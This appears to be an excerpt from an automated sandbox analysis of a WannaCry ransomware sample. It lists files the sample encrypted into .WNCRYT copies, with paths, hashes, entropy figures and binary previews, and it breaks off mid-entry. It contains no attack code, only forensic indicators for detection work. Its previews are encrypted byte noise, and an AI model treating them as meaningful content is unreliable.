                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.265640993143951
                                                  Encrypted:false
                                                  SSDEEP:6:bkEd1GseJCts3iF8FMtC8zNVtNmcFxCUSOQPFv36bX9hHwG2bhmH6Qzn:bkEv7WkeiFUol5VCc2Ud6SbXHHwG2bwJ
                                                  MD5:DA71D05A1801EDA5320AC6EB0B0EAD58
                                                  SHA1:9B8E97D4271AEB4D35D4A623B9387039C4F3C715
                                                  SHA-256:174AD64FE533C93902CF17471CC322858E9B01A120027E74D41F52B0482B1258
                                                  SHA-512:051AFD2C366B64E6166AD48AF462D95964ACB50C539242403E17BC910BADE340F69DB00AC86DA201F31424DCC2B9295E0CA91FDE29D60C8773003C0CCD031D40
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..... q...;T.*f..<.=...P....b...~o.Z.'.....r"..`(..g.....8.....`..4..3..9..u..0B.v..V..%.#}.nn.BX^&...Z3..pK......b:B.5.*|N"...w.q..d...sE....4`...GY...G.b.......-.e.c..H....*...4...."U%.xv.n...y#..M.H|.o..O.c6Jf.%.fhH....r/....bT.I....n|..J*...............).Cb..........+..j.E.`|s!....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.2032868345643255
                                                  Encrypted:false
                                                  SSDEEP:6:bkEegoGlYvGrZjQ1Aq5wrqLW0LDRN++8OcgcnlEpt/vx+wr1Yyh4:bkERlnQNKrqLnLDnptx+5
                                                  MD5:735209420E16B681AFE326D6AC853541
                                                  SHA1:89AE08302A669C42003F05F913D213285367D05F
                                                  SHA-256:724F7A5E08054DE486FFA9D205638E409459971492E74E8370522648665DECDF
                                                  SHA-512:3C9BEBB1A4B16F02E89DF32CE8E75DB4326958398A35ACC67BF608382CEB12138DDB4924B363B70A2BB7F9375422F2D2F6196D59BFAE7139E0FA7B17D6B1C7A9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....O^hK8C.;..}9...D.1....jN...&..`:s.}I.c..,...........pn....j.....B.Uo.I3..&h.4.....{%.|.....5..f9V<...Q.....fb!3.(E.x.....Ihp.dm.)...&&ef../.N..*.k<f..8..Bs.....b..vOm...X..16^..|{..vf..d.Zx;..J].......{.]~-ha. .:.5...k...].."VH,..?]..R...6.X? !..L.@...............1..#V. .....q..#.`.n..U$}...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.227356626244864
                                                  Encrypted:false
                                                  SSDEEP:6:bkE4Mamx5NsrsHG0RFSeSMqLv+a1/NUFNWJCWjuclqtJJD9c:bkEqmxorl0T7GvTGWC9clqB9c
                                                  MD5:E51A9F984721B6E030DABC4D433B2549
                                                  SHA1:D8B63E21CC619820C1850DC06A154D5E73AFAC3F
                                                  SHA-256:FB7DEEA73E067E7EFD4993D338AA429B70C59C39DA48461C28CDFB2B45DDE956
                                                  SHA-512:FDA8766DD152AA3E5D0FF1CAC8B8E18D952093248438A9621CD44445A11683FDA1FB3C00B4F32F1FAFC4548436C6649B4EA7AC164B68A3E2D041ED8576989931
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....../.GPn...b.&.g.A..M..*..*...cb}*z.B.w.c..>..l...h.....a{:..]3..qC.2.IRR..+.n.....M......@,..w.......].!uK..<g..Xt...jw.H..Ae4......)..6.{.3&b.......M..(..........-!.d_...../..I.n.$0....U..#.p....~.:\..Py[....S....`..a..I.g..n.Z...P....$..................k.w...'=....f..T..15.....%.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999789359748619
                                                  Encrypted:true
                                                  SSDEEP:24576:MXcvSEyg/Q8NgFoehgFH76Tho9DdjOYvspkT:UCSINUbhgF2hdYv7T
                                                  MD5:8B93664F85CC226F0B34C233398E098F
                                                  SHA1:30EE6E94EA4AD26F73EDD9BCFB5D4865810F3B49
                                                  SHA-256:BD8D2932340DB7A9713831028517EF74AFC812C32689BD169BABF047392F2991
                                                  SHA-512:CB73EEF34510BC80B69E40A506C59B0B7563E6B263528870754F1812DDEC319C8C5538A43DF8EB24DC31565C805B0A57982740D92D95B0001B0926EA32DB488A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....r.a&.g...-..E..~7...sq./.G..W......z.d..-.2...]B.@D9S...t.R.V+..W.....Br...Fj.....C..y.J@.X.d........G...V{)....Q...&0.Z.Q..Fi.l....T.`w...P<.yd..x.gB3..+.4.|.........*i6..L..o..............C...].].....\.h!.+{.GQ..m....l.ZfKY..l...|.Q...............(.........*.c.M.].......G{....0?.......E.F.x5v3/....6l@..$....t...X..X..7.......6*.*C....+Y.,.d...Y^m.h/5..@....+...._a.../S7Q..../..........{...nI..P.U?_|K.....c.z.B.W\+t..u..r.`.B4.hk..Yq.?.F......)4..j.DT.`..f<.=..&.[g..o..W&r.....D.6Iz #..~.....!\zLi.Q...Gi...9.;jg.s._i.e.M$.p..P3...p..d. .,...O.2.R'..w...>.).U...]...b..9.VK.Z..^......Zf.wg...`.z#..P...]Z.;b.".=........J.M.-".*,...m%4......@.....J..Ma....6_....Re_.~...c.HW....p.X...[z.m.....:.F.S.N..y..D..u%.....%.I...v..G.o@W3EU#..'..u:=?........v...[..'.S...\TXi..Q.o......f..7..Zc;C....i..sWFQ]/L...$:..{.)..ASc...rh..(.nJ.^...[V.a8.;V5d."./.I..K.....g..Z.... K......:..+o?....!"f..c..}......./..D....$.z..V......r.1..........s.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\1196d63c.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6360
                                                  Entropy (8bit):7.965787542240746
                                                  Encrypted:false
                                                  SSDEEP:96:oPfsuZdPAZgsnPDAqeKC2Mw1OLQsfEvLQu9Yj4yaLm4wczKp7ZobuxM1s9tFlG:/uvPAPUK9OMxHYjxUm4Rg1ob6MW/G
                                                  MD5:F3D17DD92BE76CD75F0FD98216E20ED4
                                                  SHA1:1DC0D331E221C1A3FCBB1C3692E17D41F120617A
                                                  SHA-256:5E12B25CC86E390E646BA805A869B2F55771F5388970E6DC1464079DCCFC3E05
                                                  SHA-512:67C730156D4F2EE235CACC77BBA8C97FF80BA8D9E38159CF40527CDE41874349A650C8D8216287EACA202D8162C27F83997A281AA757164285542F808D635920
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......r.......yKtYA...+M..{...|.0.6.M|)i.._..d.cjc%t.y...Ah....&.o..].3..S.|]...Q....n.{b.a..lz^v4P...|&..r.....a!....-....^>....f......S..6.l.X.pB...m.qZy...........G.8l..qC..|/....j6.zP.H...aHQ.=..Oo.....N.Y.0.8M....K.[....../..6.^..~_..0.M...^..............d.[...._...IB........L..46j....g..A.L........X......$...8.V.j...U.....Y.T!@j./I.......g.....i..e.dTD....U'......X?...B...&a?..!8.........c.`.(!....*.....i..R...........1.\...].j..8.IK[.t`B...6..A...;w........?~%s.f.,3.... .y.F...+..2....NO%-.M:.f.Jv.R. .=....]!.o.m..5..8.W..';..T..+K..K......T.a....(e. ..4...Q.m.BK`.%.g.*.\..n...mb.(............ L...p..cv.2J.pq...%n..T..;84.L.......u.%.....]...T..O9.......\....q..`..H....F.g.a"E=c..D..Ecl.c.d"=...G...s.y3...S.Ov.c.^.c...Z~h.!u.v..V& 6D,^..4.{W.Lw...*E.L;.|....2.G..>....%{._.>../p^.<j}.;E....t.W.._.....N.t7L...}.,QW.......jC...y9.`Uld...b..'.V..J.:.T......8$..x.iG.RINTy3s;@"Su`D.......|0"..G.'.Ye....s.L1.6S.l.H...;9P .... ......

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\2b67b297.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6760
                                                  Entropy (8bit):7.97066902697336
                                                  Encrypted:false
                                                  SSDEEP:192:TdbKtbkUiXZY01nhkABrBMb3KBRb48fRGxK6XR:TdbKtbkjDnh39g0bH6B
                                                  MD5:8A9F7FE136D56659DF8114F2820F3422
                                                  SHA1:17B58873D5F04D2D1F05F22CA111C51BCD03ECF3
                                                  SHA-256:0462F2F6777AFEFA969600C3B7592E0C3C3CCA04156FFD956044005E47C4885F
                                                  SHA-512:E42EE216872D37E0EF99CC878B8897D57C702639BB3D42F5550006E43ED571246F725C9CA9B5E35AF9CF524037748F4FBE9DE70F8EF019587A487FC64E20816C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........%.....3.2.%#\..."...4.>...n.#J....GJ.....(.G.K...)yl.....J.....LY.K......s........q.v,.o..S.....(.r..t...q..O.......Wd.o...v*U.%.V.NjwS.Y..n.....Y...}x...h...q.'..'K.%..{...)..rq#..-....YCZ].).W.....e...`..T......;..2......2S.."...4{..........K.......D5W......&..1.o.,.0h[n...m.UG...+....)...5.."..>.....%.S:.l...@BG.)......(.P7...1.......e..R....uY<..j...I.Y..{.'7..j~6...%.0u..<.....V.r..b..b{.k...B...4......p'S.:...F.e.J.V.Fp.J....>!....7..+o.$.,.S...i..m.Bkc..|...D.G..r.a.x...j..=o...v...5An.j...H.(.q)..*_..b1K...G...[..........9=.Ql..._d.X...........b.y..9.+."EiKF...9.U.n<..^..C{.t..6......._1f..<..R..;g+...2......b...}1'.XCe.hX...:..D..G....(.fZ..j|.....O..o.p..=,^=.r...S-'.1=....J.)..8:#%+$..2.@.Zg.p...r.>*v....*..'..L?T..S..7.M{MIh..=.o..c..u...w..._....m..q.*......t.V..2\f`...}..p...hW.2....{C.kD....Iu.....u.c..VF.!w."xD......1...6.?/...K...X.z.:`V6R....N....9.&..a........Ai7...=.F.K.fF..mBRc.e.Q..Q...9|...g.....Nq...yw

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):23448
                                                  Entropy (8bit):7.992175363889883
                                                  Encrypted:true
                                                  SSDEEP:384:5e9rKgZY0moFPrAHdhTbSFpBHyn6GrWpPxjyo5X6wuaZk6Tmca1Pv6Qm/:g9r5YmFChTwpyn6G8j/5XtjTm/v6B/
                                                  MD5:B23C152814987429B682D3DB4C0051E9
                                                  SHA1:A3B7151063F0701523D6AAF409287DA91E66D3CB
                                                  SHA-256:AA3315AA0A5C97DB39A595C0F6C1A6E1E21C960BE02BB9FD9703CF211ABDBFD2
                                                  SHA-512:64BFE71B6D83D8E8051F76BFC50882F072DBDB2541CAFC5B8F2292B6DA0E4F404D9B2F3D4D89985AB652A0EE12D368E23D4E7D6CE3E0DA5FC2948BCB3ABD8C37
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........~4..8...p..k...{..gU`.p..D"....~.q{..o-....7T......j....H....v.c.....;..`%N..(..|.......8.J.p..o.<~.}-......]v..H.g.].V7.K.Uh.~ ...q............:A.....JT...!....rx..]<.}.X......S...4.3...........k...U.`3.R......3. -.>....F..U.G.!T|.D....uZ.......?.(.......3v...W.o......' *.....M.6..~.8......qu...k.....{......qpM.1.h.....y_|....A.dw..'B..#.X%xlX-..8#.....P).Cz.....A..Xk..6..i.......h....,...pp.."j.o..KQ(<......Oy..JYF..>._Q9.z...\.{.w..!\.>_E/.ip.S.jB....~..X8.-........*>.6....&.g..>.si..of..\..JhE...m....J."G...~z~....R..)M...e8#pt$.R...iuc...j./.%.....n...B}'7._.......I.N.a.[sO......._..d.2......c...H.O..9.J....h9U$.N......3.......e...;6...S..(.H=.._b.....S...p2...S..{...a.,..Xu..P/...).g&.u..!..p(Hm..</.JF.$}oK......?.h..h\|.9E.\k.D...Y...u(.(....p...g... ..},....'){)..nl..X4.cz..y_....v...3...j....M..pE.V%.]...+.8`Z.....a-C2....!N.C#hj}..s.2F...._......M.l{.q.....$.L.p.."~.NZ....hmo..'...4..m.L@8....#z7.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\5fc0968a.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5240
                                                  Entropy (8bit):7.961258053494169
                                                  Encrypted:false
                                                  SSDEEP:96:oBobyakMyimPtQzXLN24K3+Et2hq1YZRAZ64rXw+mRBJMT4X38zNlw50HECXmzRO:Ota3/mPazXLw4Kuah6+mR7M0v8m1O
                                                  MD5:18AD25F0371920F02DCBA08876C08120
                                                  SHA1:E84645A2FEE33EDB7CFFBECA6998DAB9FCB106D9
                                                  SHA-256:14597B299943BEE110D213DDFDC16941F9142765B28B3D22A0A2475882419774
                                                  SHA-512:822090E5C18C9225E03BFC76BB61CDD84F1E3AC813EF9A6ABEEEB99171E635090122FB0399FCC2316DC339EC580FACF77AC1ED2779DA5F33C20D384647A1455C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....}C}a.\. .K].....^7/.y..k.;K.0j......9y.K6...jD...Y2....^>.b..e.=.Y.1/&..91..~|."....3...... 0..6z.K....+....~.@.al....a|j...J+......}.b|E?...n..1.<.y.....K......e..S.`.4......../...k....Z....P.{..kVqB.`....e.:.X..1..Z.}@o..p*l.1.").......R.......X........>.E}X&:.aG..'....w...$..>......@..x%..g.U......S....|v..qL..q...v$...../.....B.Vk......h....R.!x.BB..D..|.].N...LVJ....};.Qr#...Aukp.B.:N.BM....bzZ..>O..x.9.....)......L..Km.l..P....\.n...Z.Q....C.M..J'& ..0.....l...M...Zd?[.!....`Xf..2z.agZi..A|.....~2..n.Vy.7..c.h...0.ch8t.f./....:D....b.%..x.C...B.L#8.H.>.<#..a.j,kb...D...#.....87.WC.~Q.D....}.7..sr...x.....c.(..E.].......6......[1...f.H..p .)....Q.'..J..=r<g}...}>.U9k....G.......AFvn.i..."7o.)._j......ZX.ok.T+...`_.....z.....&F.7.i....y.V..qnj..L......G/...1.n'...F.#if..].].....v..c....U.(.s.DZ.@E..BE.X......}%...7j'E.Y.-.PH.D...x.!.[e....\Z.b.R..U.o.......'.p...u.........5.......KNc....77.B...q<....!..:-a...p.......>.A

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\70af9816.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9736
                                                  Entropy (8bit):7.975696490298713
                                                  Encrypted:false
                                                  SSDEEP:192:z+BNTrOq6Igzy0EJJqSxCOj9mdlz+g3joJEGJOj/mpLspiKQtlgfMg:CHTqEJdCOj9mtSW/mZs0KEqF
                                                  MD5:9590BEA7AFB5D6F2F84EB52C8CF59172
                                                  SHA1:AB20957A1FEE44E3F88336A6288D0FEAFDF78A79
                                                  SHA-256:B51FA46879721C7238DFCBDD2522780367C330875C8FB1CF00151D1C792D115C
                                                  SHA-512:866DF352D46F9FAD398A6883F3C8BE18375ECE3BEC8FB29E9E93F782D36928211D690F55FFFEA67D20786A10AD4B2579BD3CBE2064CBC142949E8F0427AC32FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....r....3.=N<./..1.F9.Z.F2.../...i......2.:C..Y...j..d....a.rX.....".....~<r.+....k..M.j.t.L.f.#\......s...z7..........p!.l..o.Qv......C.ik$.."._..:wz.M.q......z.q..).v..f.....{$..X....)5..&.O..z.xy.._....q5..6.O=..k...;.={..d..y...D..'.@...m.QC..1.S>2V7S.....$......N....d..bY..b1&....$%..Y;.dl.E.......3r.I[.L....GK..b.%......=..\.tI.=......I...K..........u:....l...lk;E.W....J0.`.!...@...j...5@.u..wA....c..... -.G...^..4...lW...@ ...'.....g..J.....\........Y<...../@....N}.,..o.k.;..Z.....X.@Z.h.....Kj?[..[...N...^.rg.&z.G..B.'.Zsk....?.....w......mb..6<.]....Z.AI...;{q..C..I.GH....a.#~#......S9H8N.9t.O....<...5<...N.Zo..........fK..u.a.e...k..vT.zB.......%....g...|.;..}...oc5..E.QQ........U..3...u....GG@..m..X..Q.....x.5.=.p.jN...O..&a.u.g5$...F.K...|.z{.0._..5N........cU......Y...8k...M..D..(.'.[X..H.4rF.d....U.F............ .!do.+..o...e.!L]D/f.O..Fe.....&.d.2K.]....K.....T....g.e.`l<.Lc`.h.....L9K......}.,.N.Y%.Zs&.....O..f..6R......C".&.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\8fce0f3.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4552
                                                  Entropy (8bit):7.954529835159166
                                                  Encrypted:false
                                                  SSDEEP:96:o2zb3zgrBG8Pcw5ZPOymIpoFo68l9y02j1cnYIgAtp/4mfP8J:3DgwEzPOT268f258DgAtp/40PU
                                                  MD5:FE562D00DBDCC07521317B634727524C
                                                  SHA1:EC558031F991A30F4E8BF407DB46A2CD10DCE2C6
                                                  SHA-256:3F88E34C2B4F6749EA6A3E6D6F9D0D91651D04E2A9445194EFBD19A9870C9591
                                                  SHA-512:A590E688C4E9A77F63458617759393D18007955747EEDE2C3294A4B62C5658102B6EC866B854FD3C69E9346453068E1BFAC989130ACBD02FB0EEB2B8CAADD7C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........BGE...F..0d..A6z.!....r....._.p..m.z.?.;.G.!8f..o....`.~.e.U..X..L:.......t"UI./_.?-.p......u.....yH.(.6...a...^..`p.4..>8`...B.`6p.......o].K..E.&3..'....2`.D..^........Gu=.iq[...,....L..a."X.1.J#t....b......d...Og..P^.(j...p..................u.r.&............^q.....!jD.L=.. @].~..A.....P....F.w.!..@k.).t.Xi..."..s.2.fg...i2^......>.....D..N..h.BS...G..h .w.=z...7.......iLH-..{.z~.8..".|Od..IM........z..hzq_9.[Qz4."...z._I.U}\R/..U..C.d.d...|shk..T*|Je...&Ej..{tKlq).....71i...F....O0.<.zY..(..6'....~..*DX.K1.uP..t.b.f/.cN... ..z..Qa.. .[.@...|.,(.v..E.z.S.....v[)q.....oE+..A.F...;^.xS.H|.9(L|\X9...kU..J3~.b.=.....f.)[...~1|v..;..WW.....&...x.....z..C,..O..?..P[.....{(!.7..-..tj. .;;...@.....tC...r....f.............*.....U....&..(..|....'.&...9.2...S.-.m.1.....1o..&........l}....H.S..!....(s.m....p..^.c.-E.(.R.....-.FDk....H.... izE6.....`..Y.g.Z.?C...V'.....>....mu...!.%...".E...1U0a+.ux3yv.../.s@.....).

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2097432
                                                  Entropy (8bit):7.9999181451132015
                                                  Encrypted:true
                                                  SSDEEP:49152:MbckDVoSkdIqedgIm0rUVmXwVIe0qY44Ot17cS:wNuSOIxpmCcOw2VX4NRB
                                                  MD5:DD5172B71FF64E363C8101CC0FC6ADC7
                                                  SHA1:93DC404E283CA082C44409CB748340A3FE2C10A0
                                                  SHA-256:27DC1C9C295500131F58DE9C6F3F6F7E61A563D718F8E5E3AEE741F1CBD50BAA
                                                  SHA-512:79F56D07E190B3132E4AD452770C8174FC845B6975833D48F349F2BFA7BB6C372CE69B367F0FECC98C7DE77ACA3BE947D4E26C475C8F4F2D698FB2E30C58A5F1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......#.Q..a4...7!".G..).5......i.Y.z..O..k.....=.D3s.7B..........\..!..a.........w??..1....S.hj.....gC.0..Q0*.9..i..3@.+8UR;...]0...g......)D.mA....?k's07S.S#f?r5.g..!..j.....:.vw...c.'......{...|..q7$.kP.)...8.&g-h.....oD.LtH..l`.D.....{........ ........l;.......J..%..>Y..N..W...M......}&7.J6....0.iu_%&F..3....[.gn......Z..2.R..s....'...m.......<,UI.9#...].2..i....i....dMg..{e\.R.....h...}.|@.k....Q.:.2.y...?.0O:.9...nzL...JcJ....JUXg..f.1....#V.S.n.. .v.4\....9.&..z%...:a#.}.r..(.{.ok{.@UZ*6.;..TQ...v.^.D.z.!$K}...,...*9.~..y.W.Q/.zj...C.G..F.<..q.........K..[`..9..Z...X.L..W.|.(.....g...%.2....us!P..'.xP.L.2....^..#.i9e....r.S..r%........m....\.`i...Dk0p/..tC.\..].3*..C..J...;...hq^./.....2.u..R.ykP`.?.9z.08...E..v"O.458..-.T...._>...G......&G.#...h.fi......q..U..-..[..uT}@hbW....c/..B.............6..u.5S..V...G..\..CC...u.%'..>[...D.Ps....#..`....J....UN..n;N<..[9,.-.2.\c.%.q....{.fx.0.].........KIg../.x..".......q@L;Lv

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2680
                                                  Entropy (8bit):7.91258527416419
                                                  Encrypted:false
                                                  SSDEEP:48:bkkfpbgqS7iWv8xqNJQJAnk3Mo3thj4ed5zy4SYPA:oipbgt2WUxqNyJAno3tieLzy4a
                                                  MD5:8065FE9AB6D418E716D4687045BD2424
                                                  SHA1:6C1290B2FF2A1AFB3866949F3BCEF4A115F39185
                                                  SHA-256:BA3F35654D7A262B7859F86A604C4BCA2AB1CD642A26020EE0DA46B89633249B
                                                  SHA-512:BC48E256653B17670EF9E1DB0D3917467BF83608F2B0D4BE6AC3B11945C27FA497DD4A07755F109790C568669B7FEB545EE26749CCE4AEBB58E7026D1ACA2B23
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........C~.8.wg.-.. {u3.Vod.....FC.S=.N...1.c.(..HfOk.W.s.."....&..:3....U....C\.E.X.T...Q.V.0u..x.9...(C..w|.Q.Z..v...t.....z.<..#..+...*wAh.._..=..m5.F&.+k.....K.;.{O..8l.a....!.T.|.N=..a.#.,.e~..W.f$b.cul...vU.."U..eZ....ZW.C4hV......+m4\..Hg.?U.>..'....Y.......i....{......i..g..R[.;...D.#g..9|......A...<{...D.k..<#LP.J.("../.l.C..F....N..2iB?.=..X..=..z..4.. ..~...-vo..us...u.6......P....2H]n=.......?q.9...'#.m......=....n.-7;...i.Y..WB>..{t..Ff.ji*.....u.^<g..~..Gx._..H.........[...%..t..9.%.8ZsSA.3..a{..C..mw%T.g..2.,'.t.J+.P..(....3....?:. sS....CA1........m#.)..Y.w.O...P...g..@.~'..8.O<.<;L.qk....d"b0.{..#.-.....G;...ES.Yb[.......Drm..Wgg.?j.kC.+.b.....0.._.&.h.\p.:..P.N..S..:1..m.....S-.o....q.T.^...h.<...c!..h._b2<7.o..b....)#!.....D...P&...[...V....Ows....1.i.:..@.g.g"....q....n:....P.z.l..'..S.O.....X..T.'..Se.b.=....c...<}..9......SIhE.r........c])./...Kw'M...>.....$..<}.#....P........\..q8..k.z.....R..q...m./......)..,..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1912
                                                  Entropy (8bit):7.895761039515826
                                                  Encrypted:false
                                                  SSDEEP:48:bkXllJ49In+oUTHIF6F0OuEmJzwZPEPgZyViqIJ03Mzj:o1lerL0OqJEZP8Qq603u
                                                  MD5:DC9281929B72E9BFAAFBC37994C105BA
                                                  SHA1:F0FFB64E0303EA762E5660653CFABB006567DF9B
                                                  SHA-256:7E5024C1380B5E1EBDD83A5DD452607B75D5CA9C46368B3A05818FA98E06E1D7
                                                  SHA-512:9FC3A08AD26D94054806EE26A7CB81345C74D2CF7C7D325470400A6F457A16760B1F2B86F3B7B7D52C3A0EBDC11D5513DEC670D9771B2D59747EAEF64753FB15
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....z&..M_.....H:.H.;.u5....u....[2L.:..3.. ..?......e.YX.3y..m~...1..:u..$s....c:......p...y..=Fj.J.p.K:..<...M...DT.[....L.....t.ZP^}?e.+~...#...A....k..Ps..&Z.y..G$......l..o...0<t....~v.."cd+...{g.)-.....4q,..{..@0...7.....1.".|..W.X?.5.[..0ro.3.U.....[.......!_...[.2..1..b......B%*.C..|..F.;....*..j.3..W.].6...u.........|...{. !...5wB3..p........l....o._.l..:n,.<|...[..W..h.g....`l.\P..J..J...8.H$.3_.W....m..E..._.......Q.?.x.{.=.V...........#\...S,HU.nh........Yin..b}.q.w$.......F.g&.U.(<#.J..QA.Zn)U..Lf..*..N.N..... J......S..na..~S......h.d.eap._..V.C.. zV.,....=........g{vlQ...!?..L..Op....ve..P.....tY+...!.5.....;4....L......Qn.H..C......".R-..1.5.c/.P...".......i..?.Z:..g3.K......K..>..^.5.V.g.dk=........u.h...2Z..#t.R.. ..<(..."...z..s?=Tf....N=$..ru(1U..@.&E....E.H..v^..f .wj. ..H............N.....o>Og....^..K.=...q1...@6...."=..Q...g.N.)) ....5ch84RcS.C.......}....av...[J.d|..Nq..."8.2....~f....,....`..g.C...Bc.g.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2696
                                                  Entropy (8bit):7.927990333946639
                                                  Encrypted:false
                                                  SSDEEP:48:bkfRNVOu8gwEYF6NS5UHCDfuVx7Of1VWRK5dGWIURoG++xVu7RuJBaNmM:oJPpwj+kSYuVJOf1PdFRoFaYoymM
                                                  MD5:F794F73434ED79DA6143CB6E87B0B939
                                                  SHA1:61B49A75C7291C2C349574EA4FC0AF2DFF030570
                                                  SHA-256:62B04B94ADE8FE0DE092971F00A56CAC68A9201283A597C26DA277AA701C70AA
                                                  SHA-512:F945C4393A035B5D215ABA3D0488ED5EA35011EBB7250AC9DB3036138AFD762A8397CC711711B319F2166F0560964C107AAB9ADD748E51BD6B3159BC3FBC7705
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....K!..O.9.fu/l.Z..f.Vd..!tR..q5N.iyMo.0Y...~...tZ?.d.].p|..cRtW.1....\AU-7..n.x..PB;k......5Es3m...`....3.r.......g.^.}X....r.".n.T.....i...&..5.U.T.A6(i.,..DI..C...B6m.-..g..S..,..B....R._..K..sgU.1.*.U..K....l{>...0*.@.;........F..;c.....f...K....a........4.Ow...j.....R....4.*Uw,....W..t.'....;./.....`.$C"...K...y......_...Bv.._K.-.l[.1.o1.@x...-..,.W..{5.w6...X...yt.+....a.[F...&..i....$...i.y.....".oAU."k.DG.\?%..-.>...3.....R....U`=W..|E....,)....%..G..+.u.....p.$..Ls..3..y.( !......>..[|....%...$.h\).C..49.w..R...{.?.....r'.+#..M...}../z...5 &..~......a8...Y..s.........M$...;...~.]P..ApB.4Y.$,...>[(..F..Wz..x._.;...D..@..y...L..DVQ..<....$>@.....(4..!.A.n.Y.szN.2.......... ....Yl'.....Xp...H.LQX,...V...........h..+..7...?....1.....6.p.5...a....n...$..#e.1.!q'...>C._.I.&....j~..|.f.......>....k...LY.x.#<r...+..L...A......l..i.....>..j.d...{....6+Y.V..z.#m..fqI...4....Q.....T7....=...Wz._...j.(g.....E...T..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1864
                                                  Entropy (8bit):7.915134004993225
                                                  Encrypted:false
                                                  SSDEEP:24:bkxzDIpohs2RsZL1Nnx57heiMFx5Qwlzxy6zmv1UAat0OsYRKwE66pVud6ZL:bkxzUpCs24/Qrxgv1+SlYYbbL
                                                  MD5:DAB163933701304A32CDDEE5B3EEFDA4
                                                  SHA1:5571C79DCAA983E93654DFE7EFA9B4D826236572
                                                  SHA-256:5B8C51A57DDA50B462775B288EB934B746A38CCF7AD2F98484278C871A984F45
